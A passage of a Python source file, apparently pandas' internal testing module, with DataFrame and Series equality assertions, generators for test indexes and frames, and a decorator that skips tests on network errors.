assert left.flags == right.flags, f"{repr(left.flags)} != {repr(right.flags)}"
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
rtol=rtol,
atol=atol,
obj=f"{obj}.index",
)
if check_freq and isinstance(left.index, (pd.DatetimeIndex, pd.TimedeltaIndex)):
lidx = left.index
ridx = right.index
assert lidx.freq == ridx.freq, (lidx.freq, ridx.freq)
if check_dtype:
# We want to skip exact dtype checking when `check_categorical`
# is False. We'll still raise if only one is a `Categorical`,
# regardless of `check_categorical`
if (
is_categorical_dtype(left.dtype)
and is_categorical_dtype(right.dtype)
and not check_categorical
):
pass
else:
assert_attr_equal("dtype", left, right, obj=f"Attributes of {obj}")
if check_exact and is_numeric_dtype(left.dtype) and is_numeric_dtype(right.dtype):
# Only check exact if dtype is numeric
assert_numpy_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
elif check_datetimelike_compat and (
needs_i8_conversion(left.dtype) or needs_i8_conversion(right.dtype)
):
# we want to check only if we have compat dtypes
# e.g. integer and M|m are NOT compat, but we can simply check
# the values in that case
# datetimelike may have different objects (e.g. datetime.datetime
# vs Timestamp) but will compare equal
if not Index(left._values).equals(Index(right._values)):
msg = (
f"[datetimelike_compat=True] {left._values} "
f"is not equal to {right._values}."
)
raise AssertionError(msg)
elif is_interval_dtype(left.dtype) and is_interval_dtype(right.dtype):
assert_interval_array_equal(left.array, right.array)
elif is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
_testing.assert_almost_equal(
left._values,
right._values,
rtol=rtol,
atol=atol,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
elif is_extension_array_dtype(left.dtype) and is_extension_array_dtype(right.dtype):
assert_extension_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
index_values=np.asarray(left.index),
)
elif is_extension_array_dtype_and_needs_i8_conversion(
left.dtype, right.dtype
) or is_extension_array_dtype_and_needs_i8_conversion(right.dtype, left.dtype):
assert_extension_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
index_values=np.asarray(left.index),
)
elif needs_i8_conversion(left.dtype) and needs_i8_conversion(right.dtype):
# DatetimeArray or TimedeltaArray
assert_extension_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
index_values=np.asarray(left.index),
)
else:
_testing.assert_almost_equal(
left._values,
right._values,
rtol=rtol,
atol=atol,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
# metadata comparison
if check_names:
assert_attr_equal("name", left, right, obj=obj)
if check_categorical:
if is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
assert_categorical_equal(
left._values,
right._values,
obj=f"{obj} category",
check_category_order=check_category_order,
)
# This could be refactored to use the NDFrame.equals method
def assert_frame_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_column_type="equiv",
check_frame_type=True,
check_less_precise=no_default,
check_names=True,
by_blocks=False,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_like=False,
check_freq=True,
check_flags=True,
rtol=1.0e-5,
atol=1.0e-8,
obj="DataFrame",
):
"""
Check that left and right DataFrame are equal.
This function is intended to compare two DataFrames and output any
differences. Is is mostly intended for use in unit tests.
Additional parameters allow varying the strictness of the
equality checks performed.
Parameters
----------
left : DataFrame
First DataFrame to compare.
right : DataFrame
Second DataFrame to compare.
check_dtype : bool, default True
Whether to check the DataFrame dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_column_type : bool or {'equiv'}, default 'equiv'
Whether to check the columns class, dtype and inferred_type
are identical. Is passed as the ``exact`` argument of
:func:`assert_index_equal`.
check_frame_type : bool, default True
Whether to check the DataFrame class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_names : bool, default True
Whether to check that the `names` attribute for both the `index`
and `column` attributes of the DataFrame is identical.
by_blocks : bool, default False
Specify how to compare internal data. If False, compare by columns.
If True, compare by blocks.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_like : bool, default False
If True, ignore the order of index & columns.
Note: index labels must match their respective rows
(same as in columns) - same labels must be with the same data.
check_freq : bool, default True
Whether to check the `freq` attribute on a DatetimeIndex or TimedeltaIndex.
check_flags : bool, default True
Whether to check the `flags` attribute.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'DataFrame'
Specify object name being compared, internally used to show appropriate
assertion message.
See Also
--------
assert_series_equal : Equivalent method for asserting Series equality.
DataFrame.equals : Check DataFrame equality.
Examples
--------
This example shows comparing two DataFrames that are equal
but with columns of differing dtypes.
>>> from pandas._testing import assert_frame_equal
>>> df1 = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
>>> df2 = pd.DataFrame({'a': [1, 2], 'b': [3.0, 4.0]})
df1 equals itself.
>>> assert_frame_equal(df1, df1)
df1 differs from df2 as column 'b' is of a different type.
>>> assert_frame_equal(df1, df2)
Traceback (most recent call last):
...
AssertionError: Attributes of DataFrame.iloc[:, 1] (column name="b") are different
Attribute "dtype" are different
[left]: int64
[right]: float64
Ignore differing dtypes in columns with check_dtype.
>>> assert_frame_equal(df1, df2, check_dtype=False)
"""
__tracebackhide__ = True
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, DataFrame)
if check_frame_type:
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# shape comparison
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shape mismatch", f"{repr(left.shape)}", f"{repr(right.shape)}"
)
if check_flags:
assert left.flags == right.flags, f"{repr(left.flags)} != {repr(right.flags)}"
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
check_order=not check_like,
rtol=rtol,
atol=atol,
obj=f"{obj}.index",
)
# column comparison
assert_index_equal(
left.columns,
right.columns,
exact=check_column_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
check_order=not check_like,
rtol=rtol,
atol=atol,
obj=f"{obj}.columns",
)
if check_like:
left, right = left.reindex_like(right), right
# compare by blocks
if by_blocks:
rblocks = right._to_dict_of_blocks()
lblocks = left._to_dict_of_blocks()
for dtype in list(set(list(lblocks.keys()) + list(rblocks.keys()))):
assert dtype in lblocks
assert dtype in rblocks
assert_frame_equal(
lblocks[dtype], rblocks[dtype], check_dtype=check_dtype, obj=obj
)
# compare by columns
else:
for i, col in enumerate(left.columns):
assert col in right
lcol = left.iloc[:, i]
rcol = right.iloc[:, i]
assert_series_equal(
lcol,
rcol,
check_dtype=check_dtype,
check_index_type=check_index_type,
check_exact=check_exact,
check_names=check_names,
check_datetimelike_compat=check_datetimelike_compat,
check_categorical=check_categorical,
check_freq=check_freq,
obj=f'{obj}.iloc[:, {i}] (column name="{col}")',
rtol=rtol,
atol=atol,
)
def assert_equal(left, right, **kwargs):
"""
Wrapper for tm.assert_*_equal to dispatch to the appropriate test function.
Parameters
----------
left, right : Index, Series, DataFrame, ExtensionArray, or np.ndarray
The two items to be compared.
**kwargs
All keyword arguments are passed through to the underlying assert method.
"""
__tracebackhide__ = True
if isinstance(left, pd.Index):
assert_index_equal(left, right, **kwargs)
if isinstance(left, (pd.DatetimeIndex, pd.TimedeltaIndex)):
assert left.freq == right.freq, (left.freq, right.freq)
elif isinstance(left, pd.Series):
assert_series_equal(left, right, **kwargs)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(left, right, **kwargs)
elif isinstance(left, IntervalArray):
assert_interval_array_equal(left, right, **kwargs)
elif isinstance(left, PeriodArray):
assert_period_array_equal(left, right, **kwargs)
elif isinstance(left, DatetimeArray):
assert_datetime_array_equal(left, right, **kwargs)
elif isinstance(left, TimedeltaArray):
assert_timedelta_array_equal(left, right, **kwargs)
elif isinstance(left, ExtensionArray):
assert_extension_array_equal(left, right, **kwargs)
elif isinstance(left, np.ndarray):
assert_numpy_array_equal(left, right, **kwargs)
elif isinstance(left, str):
assert kwargs == {}
assert left == right
else:
raise NotImplementedError(type(left))
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.array:
expected = pd.array(expected)
elif box_cls is pd.Index:
expected = pd.Index(expected)
elif box_cls is pd.Series:
expected = pd.Series(expected)
elif box_cls is pd.DataFrame:
expected = pd.Series(expected).to_frame()
if transpose:
# for vector operations, we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length.
expected = expected.T
elif box_cls is PeriodArray:
# the PeriodArray constructor is not as flexible as period_array
expected = period_array(expected)
elif box_cls is DatetimeArray:
expected = DatetimeArray(expected)
elif box_cls is TimedeltaArray:
expected = TimedeltaArray(expected)
elif box_cls is np.ndarray:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
def to_array(obj):
# temporary implementation until we get pd.array in place
dtype = getattr(obj, "dtype", None)
if is_period_dtype(dtype):
return period_array(obj)
elif is_datetime64_dtype(dtype) or is_datetime64tz_dtype(dtype):
return DatetimeArray._from_sequence(obj)
elif is_timedelta64_dtype(dtype):
return TimedeltaArray._from_sequence(obj)
else:
return np.array(obj)
# -----------------------------------------------------------------------------
# Sparse
def assert_sp_array_equal(left, right):
"""
Check that the left and right SparseArray are equal.
Parameters
----------
left : SparseArray
right : SparseArray
"""
_check_isinstance(left, right, pd.arrays.SparseArray)
assert_numpy_array_equal(left.sp_values, right.sp_values)
# SparseIndex comparison
assert isinstance(left.sp_index, pd._libs.sparse.SparseIndex)
assert isinstance(right.sp_index, pd._libs.sparse.SparseIndex)
left_index = left.sp_index
right_index = right.sp_index
if not left_index.equals(right_index):
raise_assert_detail(
"SparseArray.index", "index are not equal", left_index, right_index
)
else:
# Just ensure a
pass
assert_attr_equal("fill_value", left, right)
assert_attr_equal("dtype", left, right)
assert_numpy_array_equal(left.to_dense(), right.to_dense())
# -----------------------------------------------------------------------------
# Others
def assert_contains_all(iterable, dic):
for k in iterable:
assert k in dic, f"Did not contain item: {repr(k)}"
def assert_copy(iter1, iter2, **eql_kwargs):
"""
iter1, iter2: iterables that produce elements
comparable with assert_almost_equal
Checks that the elements are equal, but not
the same object. (Does not check that items
in sequences are also not the same object)
"""
for elem1, elem2 in zip(iter1, iter2):
assert_almost_equal(elem1, elem2, **eql_kwargs)
msg = (
f"Expected object {repr(type(elem1))} and object {repr(type(elem2))} to be "
"different objects, but they were the same object."
)
assert elem1 is not elem2, msg
def is_extension_array_dtype_and_needs_i8_conversion(left_dtype, right_dtype) -> bool:
"""
Checks that we have the combination of an ExtensionArraydtype and
a dtype that should be converted to int64
Returns
-------
bool
Related to issue #37609
"""
return is_extension_array_dtype(left_dtype) and needs_i8_conversion(right_dtype)
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
""" make a length k index or n categories """
x = rands_array(nchars=4, size=n)
return CategoricalIndex(
Categorical.from_codes(np.arange(k) % n, categories=x), name=name, **kwargs
)
def makeIntervalIndex(k=10, name=None, **kwargs):
""" make a length k IntervalIndex """
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeIntIndex(k=10, name=None):
return Index(list(range(k)), name=name)
def makeUIntIndex(k=10, name=None):
return Index([2 ** 63 + i for i in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k=10, freq="B", name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k=10, freq="D", name=None, **kwargs):
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k=10, name=None, **kwargs):
dt = datetime(2000, 1, 1)
return pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
def makeMultiIndex(k=10, names=None, **kwargs):
return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
_names = [
"Alice",
"Bob",
"Charlie",
"Dan",
"Edith",
"Frank",
"George",
"Hannah",
"Ingrid",
"Jerry",
"Kevin",
"Laura",
"Michael",
"Norbert",
"Oliver",
"Patricia",
"Quinn",
"Ray",
"Sarah",
"Tim",
"Ursula",
"Victor",
"Wendy",
"Xavier",
"Yvonne",
"Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
"""
Make a DataFrame with a DatetimeIndex
Parameters
----------
start : str or Timestamp, default "2000-01-01"
The start of the index. Passed to date_range with `freq`.
end : str or Timestamp, default "2000-12-31"
The end of the index. Passed to date_range with `freq`.
freq : str or Freq
The frequency to use for the DatetimeIndex
seed : int, optional
The random state seed.
* name : object dtype with string names
* id : int dtype with
* x, y : float dtype
Examples
--------
>>> _make_timeseries()
id name x y
timestamp
2000-01-01 982 Frank 0.031261 0.986727
2000-01-02 1025 Edith -0.086358 -0.032920
2000-01-03 982 Edith 0.473177 0.298654
2000-01-04 1009 Sarah 0.534344 -0.750377
2000-01-05 963 Zelda -0.271573 0.054424
... ... ... ... ...
2000-12-27 980 Ingrid -0.132333 -0.422195
2000-12-28 972 Frank -0.376007 -0.298687
2000-12-29 1009 Ursula -0.865047 -0.503133
2000-12-30 1000 Hannah -0.063757 -0.507336
2000-12-31 972 Tim -0.869120 0.531685
"""
index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
n = len(index)
state = np.random.RandomState(seed)
columns = {
"name": state.choice(_names, size=n),
"id": state.poisson(1000, size=n),
"x": state.rand(n) * 2 - 1,
"y": state.rand(n) * 2 - 1,
}
df = pd.DataFrame(columns, index=index, columns=sorted(columns))
if df.index[-1] == end:
df = df.iloc[:-1]
return df
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
yield from make_index_funcs
def all_timeseries_index_generator(k=10):
"""
Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs = [makeDateIndex, makePeriodIndex, makeTimedeltaIndex]
for make_index_func in make_index_funcs:
# pandas\_testing.py:1986: error: Cannot call function of unknown type
yield make_index_func(k=k) # type: ignore[operator]
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(_N)
return Series(randn(_N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(_N)
return Series(randn(_N), index=index, name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(_N)
data = Index(data, dtype=object)
index = makeStringIndex(_N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(_N)
return {c: Series(randn(_N), index=index) for c in getCols(_K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = _N
return Series(randn(nper), index=makeDateIndex(nper, freq=freq), name=name)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = _N
return Series(randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(_K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(_K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame():
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""
Create an index/multindex with given dimensions, levels, names, etc'
nentries - number of entries in index
nlevels - number of levels (> 1 produces multindex)
prefix - a string prefix for labels
names - (Optional), bool or list of strings. if True will use default
names, if false will use no names, if a list is given, the name of
each level in the index will be taken from the list.
ndupe_l - (Optional), list of ints, the number of rows for which the
label will repeated at the corresponding level, you can specify just
the first few, the rest will use the default ndupe_l of 1.
len(ndupe_l) <= nlevels.
idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a datetime index.
if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
assert names is None or names is False or names is True or len(names) is nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func = {
"i": makeIntIndex,
"f": makeFloatIndex,
"s": makeStringIndex,
"u": makeUnicodeIndex,
"dt": makeDateIndex,
"td": makeTimedeltaIndex,
"p": makePeriodIndex,
}.get(idx_type)
if idx_func:
# pandas\_testing.py:2120: error: Cannot call function of unknown type
idx = idx_func(nentries) # type: ignore[operator]
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
f"{repr(idx_type)} is not a legal value for `idx_type`, "
"use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
tuples = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
# pandas\_testing.py:2148: error: Need type annotation for 'cnt'
cnt = Counter() # type: ignore[var-annotated]
for j in range(div_factor):
label = f"{prefix}_l{i}_g{j}"
cnt[label] = ndupe_l[i]
# cute Counter trick
result = sorted(cnt.elements(), key=keyfunc)[:nentries]
tuples.append(result)
tuples = list(zip(*tuples))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Create a DataFrame using supplied parameters.
Parameters
----------
nrows, ncols - number of data rows/cols
c_idx_names, idx_names - False/True/list of strings, yields No names ,
default names or uses the provided names for the levels of the
corresponding index. You can provide a single string when
c_idx_nlevels ==1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
data_gen_f - a function f(row,col) which return the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a timedelta index.
if unspecified, string labels will be generated.
Examples
--------
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
# 4-level multindex on rows with names provided, 2-level multindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FI","FO","FAM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: f"R{r}C{c}"
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = int(np.round((1 - density) * nrows * ncols))
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
# pandas\_testing.py:2306: error: "_create_missing_idx" gets multiple
# values for keyword argument "density" [misc]
# pandas\_testing.py:2306: error: "_create_missing_idx" gets multiple
# values for keyword argument "random_state" [misc]
i, j = _create_missing_idx( # type: ignore[misc]
*df.shape, density=density, random_state=random_state
)
df.values[i, j] = np.nan
return df
def optional_args(decorator):
"""
allows a decorator to take optional positional and keyword arguments.
Assumes that taking a single, callable, positional argument means that
it is decorating a function, i.e. something like this::
@my_decorator
def function(): pass
Calls decorator with decorator(f, *args, **kwargs)
"""
@wraps(decorator)
def wrapper(*args, **kwargs):
def dec(f):
return decorator(f, *args, **kwargs)
is_decorating = not kwargs and len(args) == 1 and callable(args[0])
if is_decorating:
f = args[0]
# pandas\_testing.py:2331: error: Incompatible types in assignment
# (expression has type "List[<nothing>]", variable has type
# "Tuple[Any, ...]")
args = [] # type: ignore[assignment]
return dec(f)
else:
return dec
return wrapper
# skip tests on exceptions with this message
_network_error_messages = (
# 'urlopen error timed out',
# 'timeout: timed out',
# 'socket.timeout: timed out',
"timed out",
"Server Hangup",
"HTTP Error 503: Service Unavailable",
"502: Proxy Error",
"HTTP Error 502: internal error",
"HTTP Error 502",
"HTTP Error 503",
"HTTP Error 403",
"HTTP Error 400",
"Temporary failure in name resolution",
"Name or service not known",
"Connection refused",
"certificate verify",
)
# or this e.errno/e.reason.errno
_network_errno_vals = (
101, # Network is unreachable
111, # Connection refused
110, # Connection timed out
104, # Connection reset Error
54, # Connection reset by peer
60, # urllib.error.URLError: [Errno 60] Connection timed out
)
# Both of the above shouldn't mask real issues such as 404's
# or refused connections (changed DNS).
# But some tests (test_data yahoo) contact incredibly flakey
# servers.
# and conditionally raise on exception types in _get_default_network_errors
def _get_default_network_errors():
# Lazy import for http.client because it imports many things from the stdlib
import http.client
return (IOError, http.client.HTTPException, TimeoutError)
def can_connect(url, error_classes=None):
"""
Try to connect to the given url. True if succeeds, False if IOError
raised
Parameters
----------
url : basestring
The URL to try to connect to
Returns
-------
connectable : bool
Return True if no IOError (unable to connect) or URLError (bad url) was
raised
"""
if error_classes is None:
error_classes = _get_default_network_errors()
try:
with urlopen(url):
pass
except error_classes:
return False
else:
return True
@optional_args
def network(
t,
url="https://www.google.com",
raise_on_error=_RAISE_NETWORK_ERROR_DEFAULT,
check_before_test=False,
error_classes=None,
skip_errnos=_network_errno_vals,
_skip_on_messages=_network_error_messages,
):
"""
Label a test as requiring network connection and, if an error is
encountered, only raise if it does not find a network connection.
In comparison to ``network``, this assumes an added contract to your test:
you must assert that, under normal conditions, your test will ONLY fail if
it does not have network connectivity.
You can call this in 3 ways: as a standard decorator, with keyword
arguments, or with a positional argument that is the url to check.
Parameters
----------
t : callable
The test requiring network connectivity.
url : path
The url to test via ``pandas.io.common.urlopen`` to check
for connectivity. Defaults to 'https://www.google.com'.
raise_on_error : bool
If True, never catches errors.
check_before_test : bool
If True, checks connectivity before running the test case.
error_classes : tuple or Exception
error classes to ignore. If not in ``error_classes``, raises the error.
defaults to IOError. Be careful about changing the error classes here.
skip_errnos : iterable of int
Any exception that has .errno or .reason.erno set to one
of these values will be skipped with an appropriate
message.
_skip_on_messages: iterable of string
any exception e for which one of the strings is
a substring of str(e) will be skipped with an appropriate
message. Intended to suppress errors where an errno isn't available.
Notes
-----
* ``raise_on_error`` supersedes ``check_before_test``
Returns
-------
t : callable
The decorated test ``t``, with checks for connectivity errors.
Example
-------
Tests decorated with @network will fail if it's possible to make a network
connection to another URL (defaults to google.com)::
>>> from pandas._testing import network
>>> from pandas.io.common import urlopen
>>> @network
... def test_network():
... with urlopen("rabbit://bonanza.com"):
... pass
Traceback
...
URLError: <urlopen error unknown url type: rabit>
You can specify alternative URLs::
>>> @network("https://www.yahoo.com")
... def test_something_with_yahoo():
... raise IOError("Failure Message")
>>> test_something_with_yahoo()
Traceback (most recent call last):
...
IOError: Failure Message
If you set check_before_test, it will check the url first and not run the
test on failure::
>>> @network("failing://url.blaher", check_before_test=True)
... def test_something():
... print("I ran!")
... raise ValueError("Failure")
>>> test_something()
Traceback (most recent call last):
...
Errors not related to networking will always be raised.
"""
from pytest import skip
if error_classes is None:
error_classes = _get_default_network_errors()
t.network = True
@wraps(t)
def wrapper(*args, **kwargs):
if (
check_before_test
and not raise_on_error
and not can_connect(url, error_classes)
):
skip()
try:
return t(*args, **kwargs)
except Exception as err:
errno = getattr(err, "errno", None)
if not errno and hasattr(errno, "reason"):
# pandas\_testing.py:2521: error: "Exception" has no attribute
# "reason"
errno = getattr(err.reason, "errno", None) # type: ignore[attr-defined]
if errno in skip_errnos:
skip(f"Skipping test due to known errno and error {err}")
e_str = str(err)
if any(m.lower() in e_str.lower() for m in _skip_on_messages):
skip(
f"Skipping test because exception message is known and error {err}"
)
if not isinstance(err, error_classes):
raise
if raise_on_error or can_connect(url, error_classes):
raise
else:
skip(f"Skipping test due to lack of connectivity and error {err}")
return wrapper
with_connectivity_check = network
@contextmanager
def assert_produces_warning(
expected_warning: Optional[Union[Type[Warning], bool]] = Warning,
filter_level="always",
check_stacklevel: bool = True,
raise_on_extra_warnings: bool = True,
match: Optional[str] = None,
):
"""
Context manager for running code expected to either raise a specific
warning, or not raise any warnings. Verifies that the code raises the
expected warning, and that it does not raise any other unexpected
warnings. It is basically a wrapper around ``warnings.catch_warnings``.
Parameters
----------
expected_warning : {Warning, False, None}, default Warning
The type of Exception raised. ``exception.Warning`` is the base
class for all warnings. To check that no warning is returned,
specify ``False`` or ``None``.
filter_level : str or None, default "always"
Specifies whether warnings are ignored, displayed, or turned
into errors.
Valid values are:
* "error" - turns matching warnings into exceptions
